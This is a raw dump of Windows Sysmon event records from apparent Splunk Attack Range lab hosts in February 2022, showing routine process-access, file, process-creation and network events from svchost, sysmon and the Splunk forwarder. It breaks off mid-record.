10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:45.070{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:46.206{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:46.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFF41CBF2E805007780B231D1B2F74D,SHA256=9351E07396DA59225BF15F14BBC46636E2E422CEB57987EE6F80CEB5AC5899D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:46.170{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28539AA3B46FF6E8386FEE444F6AA4F4,SHA256=680583AB3F983A95EC0965FFF217DA8D55367C69537548402ADA4A77E69ABC0E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A3-6216-9B04-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-13A3-6216-9B04-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.893{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A3-6216-9B04-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.894{4F8D34B0-13A3-6216-9B04-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.639{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51446-false10.0.1.12-8089- 10341000x8000000000000000218222Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:47.222{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A3-6216-9A04-000000003902}3508C:\Program 